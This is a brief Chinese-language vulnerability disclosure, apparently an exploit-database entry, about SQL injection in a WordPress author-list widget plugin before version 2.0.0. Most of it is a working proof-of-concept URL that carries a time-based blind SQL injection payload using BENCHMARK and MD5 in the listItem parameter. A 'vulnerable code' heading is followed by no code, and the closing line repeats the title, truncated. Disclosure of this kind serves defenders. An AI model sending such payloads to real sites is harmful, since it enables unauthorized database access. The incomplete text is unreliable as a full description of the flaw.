# WordPress 的List Widget插件在低于 2.0.0版本中存在 SQL注入漏洞 # 测试版本: 2.0.0 --- PoC --- https://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- 存在漏洞的代码 ---------------
# WordPress 的List Widget插件在低于 2.0.0版本中存在 SQ